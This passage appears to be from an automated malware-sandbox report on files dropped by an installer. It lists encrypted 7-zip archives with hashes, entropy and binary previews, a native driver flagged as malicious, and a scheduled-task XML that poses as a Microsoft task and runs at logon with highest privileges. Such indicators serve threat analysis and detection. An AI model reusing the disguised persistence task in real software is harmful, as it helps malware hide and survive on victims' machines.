                            Preview:....7y|[.G...y,Ec..{.$\*....d:d.......a.oR.11;...k!..]..+=..T...L..@..fj [_..../?.f..unW%>.#.-..@ >...)j.....t.l.Z.N.;.a.........A...**.i......+...-..t}:5.,.....n..6._?._9..8_...h...9r...........fs.b.....!..s...{.E...).9..`...:c4.........2!..5`lU.f.'.X]9q.^."...x%.L%>..F..'....I..[g.6...\..`.&<.`vu...q.Oq..h~........"z......_.A/.`1..uc....D.8<3./...[.......4W..._.uO.B.n.q>.......T\.......Q..;.}..z6...m....@...2....=..zp..h......-.yG.D.8......U..)5..Y....iG.....i......A..Kq0.t..q...;........4...........4...q.f_..<...lf.y..2.......9...j..6....|...|]...q....+..XbL_...C*A^..O.*._.. ..H.e*.,.9.'.........y..hFyd..d...J.. Jz:R..l....l&....5...+.m.M,.....`..Bu.V.G,0wj..M....j..i..........~d..".3..k...Jc.HD...VG....y..<....dg....:.&..BD.\D hp.D1.s..MF...c..!.....0.A..?.....6.....}4.+......VWz.N.!.....%0..B.F.....?......*..G9I.Y0.........=..&.e.P....1..}.!....U.9........a......pnF..:d...x.fPJ...=..s.k......?...*..L.wy.......$...l$....._.....p#..&
                            Process:C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):1839696
                            Entropy (8bit):7.999886083195026
                            Encrypted:true
                            SSDEEP:49152:xtf/Ncq8cVEEhPBMp8NcD8GROsSzBltnw7sK:xtCILNcD8GgsSzXtnw7T
                            MD5:AEE77D886C26E516786EDF2DEABC2A7E
                            SHA1:5803AA2C3A033DB5C923C69AA51B24B54A0A88FB
                            SHA-256:F804B51355D79AD91AE47B2AFA19B7FC39931DE06103D14CE3924BD197CEDCE6
                            SHA-512:F6F9AEB2B604D7CF73B8C2AA8100D7B4F49B6D6F002B1178CDC0CAAC3F6C850CCF82515017CBCFD412E390AB0E3AEE313F48074BEDD534F33DF7E1B4E676BB6C
                            Malicious:false
                            Preview:.@S....Sj....................!Z._......dJ...i.Q}[.../u"l..._...A..m.gd.......v..@:z.Q!.&.&.$.@.t|....4.....}_..{..w....F....4. !.'P.8!j.....4)j!..M8E...$4mr....a.|...O.i...{w..5.>.H....u..U.....>.#..(+.S.Y._....P...G]..DZI. ..L..cf..z.....|.......F..~..X].!.q....U....LB@sU.,.w8..s.h...u.....|*.........H.}V.GOuK.*7HwKc.=.hq...8.._u.]B.s..y...3...R..:.....9..a...b..7M..~.....1*...7.R.RW.v.a.jdY....=...(..t$B...e......*.........W.Cl.........sE........I.....9........,`.Cj........n.J.....L].|..,.o_..'.#...*....G.....9.{....{..3...c..S&.\.Dg..^.S...~&....tW.......4...*....|.d..V......?=e.....x......*.g....e.J..t...2.....B.vgE..L4...o(>...?q..Q..bt*L...l.@"...}8...a..s...#/..`......ZxCk;..E.k..|..=.0...s..st.lZ...a...T...ZE*.).O.......M.R.[.o.s.,X.;y..J3.,.....CGnp..R.P.e.]|B$U.........c..x.a8xk.`D)E<...6.6.V........S..l/..Z.{..Tf..[..9.S...O}........i..K.zA..).9.^......4..`K.'.p..+s.@0.U.U...U.....!&.M.5....dtb.*8...._P...n..+
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):56562
                            Entropy (8bit):7.997362278243266
                            Encrypted:true
                            SSDEEP:1536:R0LJTdsTl50XcK85pRUf20ZZmQPMTpKyn:RoVdsTPK8rN0PTyn
                            MD5:B5C6B4D2B268DD9704486761D80D910C
                            SHA1:BDA77B2E009BBF8785DE135B5FA28A584AB9F8E3
                            SHA-256:9EA66FE4BBD81419FF083AC21EB847620952B3E664916D4B9800325B36A9B47F
                            SHA-512:35199BD345DA2943A4FC27633475712F92EEBAE9D9A97206EFE69792F96A7E2A4AF80E9B031AE3C97863F8556994FF6B841BDEC484109E6AC88DB29C4573E7EF
                            Malicious:false
                            Preview:.@S....-.d.\ ................{vG.*.c.n....../..=?....sny!...&.`..0... ....G.t.....D;.{<...4.@.4c.s.....]..7.dw.6O1.R.....R.+x..1....W.....t...\......wG..*J...;.E}A.z#.J.o[C.w.3@.`@.z.....$......i\....?....2.,-..w9.......'........^r....&........o.....b......B..s.+.L~L..U.B%..xA.OW->c-kg7z...gZH.BX...:.....s..VC.....g6.RG3..\.....lZo.Y..?..y.....V.&3..x..ua.tz...j...Z.d.~.9.]......&.r.7...x..N.H.C..^f.X....B.*...x."Ih.3.."j...Ls.=...:Q0..>...z..h.......b.... .|.qD~L.87/..g....Mu........5SX....P...EY9x..pnsW<....H.Qx.s.\.JH...o.4X.Lf..R@.c.<.Yzta..[...&=UV...M..y*a.S!i.|J./<...Ml..!l.l2..z.~Y..@.(..y.T..p..)...s.d..7....I.3?..J..c..pAS|.:.|."...e._..%.)LZA.....3:_./.)s...t=K..9...^\^...[.........o{..\..jZ.....a/SQ...pio;...-H..T.aV.r..B.B.qQ...R.*1.....t.X.q..2.M..*..FI.[...t..@2...b.NXS".".e~.P........V....#.Ib.....:.....Wm......T........x-GZ:G......G..s.8A&9.....4..X.........*^..-T.T....b...;,qGpgy....1.6...Z.~s..V_B.E...E_%.,}U..T..u...L]
                            Process:C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):56562
                            Entropy (8bit):7.997362278243265
                            Encrypted:true
                            SSDEEP:768:+Avgw0HQ88PXghVEQP5JgHeJsTFlZPmXzyifCoC9DrbRJTLy+n2q5qIz/ywocZ9x:+pwAcr6kFXPmjy3pVvfRjQI26kAv0FU
                            MD5:98E4A42C940DB0871F26850402C70F94
                            SHA1:C23C68FB4172BADBA363BFE8268457218AFAACB0
                            SHA-256:447913D96FBF4EF44D75357CED22E0622633620DB56DC6BD4F88B5E2D5692A9D
                            SHA-512:38F068830CF840140612D347A872A62E78D23E5EFD4299427833C1ADEB11C690ABD96535541446E5E8EF2CF10F5217D0BAEDEC70F80A9EEF5CD0EDB07268D00C
                            Malicious:false
                            Preview:7z..'....M.O........2................&.A.......B...4.^C....v.#.m.}..(...*.|K...G.{.r...[..:D~......M...7c....-.q.........>...J.v.^{..t`...z|.w..d..*BXk.D{..\...ul.....=.......O.7.y..~.o.C.d..s.v5#...}s_....W.^..Io..Lt>9Y....7yd]wP..r..,....<s,...qbm.m..&>..zz..U....;.....b..<...N..h.......s;:...3...~M.!.vi.\.@...EB.=..o...&...S..#...c.c..^J.#.O .D....v...F..H...B<.[".>.%.c....<)....c./....D0.x.;.......0 .)...L.f.........lH...`.l....9......`..'v...eM7G.`u^..L.C....+...|r.n3>i..._.u'.zhI....y.{ca...u...h.......z6.h.D..U.1....wS.V.+...B..[.0.m....S..N.......v.kb.....t.....ky..5~v....Z.8..C.....4.>....I..x.<.t..$.lQ8..f..*..kk.D.........,.E.w.N..;.6]....L.......5r._g4...........ut...Y;.w..?.C...b.U_..F..x!...g.c....T.........N..T.1.#..Qt....2.O.$t.....rq....I.a..3:R..E.0.P./B...*..w....$g......IwX?"X.!p,.h xAC.B...GT.SQ7D......xJ"qL.C.U&...G.~....rX.S..x.R<.P...hO....O'.sZ.M.MMK..(#N.2.:'Udk..........~..4.%.J...#..2C/...@..N....-.. P..4.R..81..
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):56546
                            Entropy (8bit):7.996966859255975
                            Encrypted:true
                            SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                            MD5:CEA69F993E1CE0FB945A98BF37A66546
                            SHA1:7114365265F041DA904574D1F5876544506F89BA
                            SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                            SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                            Malicious:false
                            Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                            Process:C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):56546
                            Entropy (8bit):7.996966859255979
                            Encrypted:true
                            SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                            MD5:4CB8B7E557C80FC7B014133AB834A042
                            SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                            SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                            SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                            Malicious:false
                            Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):31890
                            Entropy (8bit):7.99402458740637
                            Encrypted:true
                            SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                            MD5:8622FC7228777F64A47BD6C61478ADD9
                            SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                            SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                            SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                            Malicious:false
                            Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                            Process:C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):31890
                            Entropy (8bit):7.99402458740637
                            Encrypted:true
                            SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                            MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                            SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                            SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                            SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                            Malicious:false
                            Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):74960
                            Entropy (8bit):7.99759370165655
                            Encrypted:true
                            SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                            MD5:950338D50B95A25F494EE74E97B7B7A9
                            SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                            SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                            SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                            Malicious:false
                            Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                            Process:C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):74960
                            Entropy (8bit):7.997593701656546
                            Encrypted:true
                            SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                            MD5:059BA7C31F3E227356CA5F29E4AA2508
                            SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                            SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                            SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                            Malicious:false
                            Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):29730
                            Entropy (8bit):7.994290657653607
                            Encrypted:true
                            SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                            MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                            SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                            SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                            SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                            Malicious:false
                            Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                            Process:C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:modified
                            Size (bytes):29730
                            Entropy (8bit):7.994290657653608
                            Encrypted:true
                            SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                            MD5:A9C8A3E00692F79E1BA9693003F85D18
                            SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                            SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                            SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                            Malicious:false
                            Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                            Process:C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):1839696
                            Entropy (8bit):7.9998860831950305
                            Encrypted:true
                            SSDEEP:24576:+HzR47j/tl3qU15r8iKxlbSpM9sTeiTt1x5IY+/1orxnLatvlpo/szCok8pYT6M4:+y7f3qIHpMAT5IYdnLaPS/sz5n
                            MD5:3FE034F663D01C52AB4B5016A2FEC51A
                            SHA1:E41E354C73BCA7427769E343B821052079F36232
                            SHA-256:B0B8A351BADE6E0D57F1EC38E5159F8B7CBD66709875A351F6F52A88F053C97C
                            SHA-512:CAB5E05C69A7B7199B79AFF2DD1477950BBC1EF56FBE17FEE167CCA499FF6E8F2A21A0825CD2E67E32EB1F3E45622FF1FBF75CACDADE537E19E7CE5E335A0D61
                            Malicious:false
                            Preview:7z..'.....N.........@.......]..v..%}..O..U.}.7|...^GJ...U..=!bV.~..u....N..j)V.....!..|.3...H.l....wo. fJ/...bn.lW.E0.g..&)(.\../.]...{U>....d.....T|....7-.R.{z.|.L.1....^..d....3{8_...C.<..Y'LQ.3.4Z...^.6.$.jDMB..V;..........n5..b..,h..W..?..t!W.O.0...1.x.....Z.v.....!.$.....J.....gPg.V.2...aD;<...Y..H]y.....e.......g.....:x.U....q.{z..:.....K...p.$]`d.2.... ...#....W/.<I..s/^.4.rUc..GE{...R...k....._.pz-F3..d..tt..T9M?...V^.m.v.....96..7..SGyB7./BtV..]..v0gb.xR.<*.....U._....."l..dQN[\ms'H.].RajI...8.;;J.W.......@RO.j.4.f..^/.#.b....v#...2e..#....z...Tr_.E.D.......Nm...job......d....;.'.M....@Ky9...M2.".w..F_j....8S61....[.Mo..Y.mf=.[....I..~.8...#.^..%R.Bu...#.D.b..tn}...!'.Xa..I=..\..`.i`VK.O......33..S.4....I.Y..........r.v..uV..C|...V.K.%.t6t.+y.......8K.a..{..z..k.1.j*=.DE....N'...N.....m_n.+.t@..).e.........8Z.Gs._...'JZ?0.\.!.......i.R?e..u!..O.7.h...W.l.m.|.K....=....q...W..a..a..k....e.9..s.Y..2.(.sy,...}......Z...A0...u..>.]S..?z....t.
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):63640
                            Entropy (8bit):6.482810107683822
                            Encrypted:false
                            SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                            MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                            SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                            SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                            SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 9%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):4096
                            Entropy (8bit):3.3535066459795764
                            Encrypted:false
                            SSDEEP:48:dXKLzDlnnL6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnWwhldOVQOj6dKbKsz7
                            MD5:799B43ECF550F33D590F92CFC3711467
                            SHA1:672863B4F94FE693EB63AE74341CBD5B4330ABEA
                            SHA-256:8F57E4C2E94F9D06AA200B6BE6F4582E1E8FE9A0D3971F15273E6B1B152134F0
                            SHA-512:AB4608E516D311A4D5EC119A0F50D703EBEF83C55FB7E1E82AAAE1FF5165156069F3B67913F211038D555C5272E2CA3F15AE372C421656C1B9674A335EF14DAA
                            Malicious:false
                            Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNet
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1589569
                            Entropy (8bit):7.999901863430879
                            Encrypted:true
                            SSDEEP:24576:v5v7d85bpwCIcOT5hc2Qe4Uz9ba8VcpMvl1JdrYdVUtuj8rGucZ+0LsX1VHqQZf8:BvGXwaOdaUzMGLAiRh7KQ5tpoR
                            MD5:77F6ED0F9554EA74050C5A8FDB365A30
                            SHA1:84111F13FB1AB25E61BD88FF0A7C4B61C40E2C8E
